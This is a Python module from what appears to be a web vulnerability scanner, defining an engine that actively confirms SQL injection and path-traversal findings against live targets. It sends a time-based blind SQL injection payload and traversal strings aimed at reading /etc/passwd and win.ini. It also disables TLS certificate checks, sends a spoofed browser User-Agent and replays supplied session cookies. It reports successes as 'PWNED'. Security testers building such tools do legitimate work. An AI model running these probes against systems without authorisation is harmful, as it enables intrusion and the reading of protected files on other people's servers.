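# modules/exploiter.py
import requests
import time
from urllib.parse import urlparse, urljoin


class ExploiterEngine:
    """Actively re-tests candidate findings produced by an earlier scan stage.

    Two checks are implemented: a time-based SQL-injection probe and a
    path-traversal/LFI probe. Both are best-effort: a failed HTTP request is
    treated as "not confirmed" rather than surfaced as an error.

    Operational caveats a reader should know before running this:

    * TLS certificate validation is switched off for the whole session, so any
      Cookie/Authorization value supplied by the operator travels over an
      unauthenticated channel.
    * ``verify_sqli`` asks the target database to sleep; on a vulnerable host
      that occupies a DB worker for the duration of each probe.
    * Confirmed findings are mutated in place (severity, risk_score,
      description) and the same dict objects are returned by ``start``.
    """

    def __init__(self, verified_vulns, auth_header='', logger_callback=None):
        """Set up the HTTP session shared by all probes.

        Args:
            verified_vulns: iterable of finding dicts. ``start`` reads the
                ``type``, ``url`` and ``payload`` keys and overwrites
                ``severity``, ``risk_score`` and ``description`` on hits.
            auth_header: optional raw header line, either ``"Cookie: ..."`` or
                ``"Authorization: ..."``. Any other value is silently ignored.
            logger_callback: callable taking one string; defaults to ``print``.
        """
        self.vulns = verified_vulns
        self.auth_header = auth_header
        self.log = logger_callback if logger_callback else print
        self.session = requests.Session()

        # Configure session with stealth headers.
        # NOTE(review): verify=False disables certificate validation for every
        # request this engine sends, including the ones carrying auth_header.
        self.session.verify = False
        # Assignment (not .update) replaces whatever header set the session
        # had; only the User-Agent below remains.
        self.session.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
        }

        # Inject Auth if provided. The label is matched as a substring and
        # str.replace drops every occurrence of it, not only a leading one.
        if self.auth_header:
            if "Cookie:" in self.auth_header:
                self.session.headers['Cookie'] = self.auth_header.replace("Cookie:", "").strip()
            elif "Authorization:" in self.auth_header:
                self.session.headers['Authorization'] = self.auth_header.replace("Authorization:", "").strip()

    def verify_sqli(self, url, original_payload):
        """Attempts to confirm SQLi using Time-Based Blind injection.

        The sleep payload is appended verbatim to ``url`` and the round-trip
        time of a single GET is measured. ``original_payload`` is accepted for
        interface compatibility but is not used by this check.

        Returns:
            True when the response took more than 3 s and less than 8 s;
            False for any other timing and for any request error.
        """
        # A payload that asks the DB to sleep for 3 seconds.
        # NOTE(review): the previous comment called this a MySQL/PostgreSQL
        # polyglot; nothing here verifies that, so treat a negative result as
        # inconclusive rather than as "not vulnerable".
        sleep_payload = "' OR SLEEP(3)--"

        # If the original payload was generic, we append our verification payload
        target_url = f"{url}{sleep_payload}"

        try:
            # perf_counter is monotonic; time.time() can jump with clock
            # adjustments and skew a duration measurement.
            started = time.perf_counter()
            self.session.get(target_url, timeout=10)
            duration = time.perf_counter() - started

            # Count only a response slower than the requested sleep but well
            # short of the 10 s request timeout. Plain network latency can
            # push a request past 3 s, so a single hit is weak evidence.
            if 3.0 < duration < 8.0:
                return True
        except Exception:
            # Best-effort: any request failure means "not confirmed". The
            # previous bare `except:` also swallowed KeyboardInterrupt and
            # SystemExit, which made a running scan impossible to abort.
            pass
        return False

    def verify_lfi(self, url):
        """Attempts to read common system files.

        Each traversal string is appended verbatim to ``url``; the response
        body is then searched for a marker expected from the requested file
        (``root:x:0:0`` for etc/passwd, ``[extensions]`` for win.ini).

        Returns:
            True on the first marker hit; False if no payload produced one or
            every request failed.
        """
        lfi_payloads = [
            "../../../../../../../../etc/passwd",
            "../../../../../../../../windows/win.ini"
        ]

        for payload in lfi_payloads:
            # Assume the vuln param is at the end or needs replacing
            # For simplicity in this demo, we append. In a real tool, we'd replace params.
            target = f"{url}{payload}"
            try:
                res = self.session.get(target, timeout=5)
                if "root:x:0:0" in res.text or "[extensions]" in res.text:
                    return True
            except Exception:
                # Best-effort per payload; not a bare except so that
                # KeyboardInterrupt/SystemExit still propagate.
                pass
        return False

    def start(self):
        """Run the matching probe for every finding and collect the confirmed ones.

        Dispatch is on a case-insensitive substring of ``v['type']``: "SQL"
        routes to ``verify_sqli``; "TRAVERSAL" or "FILE INCLUSION" to
        ``verify_lfi``; anything else is skipped untouched.

        Side effects:
            Confirmed findings are mutated in place — ``severity`` and
            ``risk_score`` are overwritten and a marker is appended to
            ``description`` — and those same dict objects are returned.

        Returns:
            list of the finding dicts that were confirmed.
        """
        self.log("⚔️ [EXPLOIT] Initiating Active Verification Protocols...")
        confirmed_exploits = []

        for v in self.vulns:
            vuln_type = v['type'].upper()
            is_confirmed = False

            # 1. SQL Injection Verification
            if "SQL" in vuln_type:
                self.log(f" └── Testing SQLi candidate: {v['url']}")
                if self.verify_sqli(v['url'], v['payload']):
                    v['severity'] = "CRITICAL (EXPLOIT CONFIRMED)"
                    v['risk_score'] = 10
                    v['description'] += " [CHIMERA VERIFIED: Time-based SQLi executed successfully]"
                    is_confirmed = True

            # 2. Path Traversal / LFI Verification
            elif "TRAVERSAL" in vuln_type or "FILE INCLUSION" in vuln_type:
                self.log(f" └── Testing LFI candidate: {v['url']}")
                if self.verify_lfi(v['url']):
                    v['severity'] = "CRITICAL (EXPLOIT CONFIRMED)"
                    v['risk_score'] = 10
                    v['description'] += " [CHIMERA VERIFIED: System file read access confirmed]"
                    is_confirmed = True

            if is_confirmed:
                self.log(f"🔥 [PWNED] Exploit successful at {v['url']}")
                confirmed_exploits.append(v)

        return confirmed_exploits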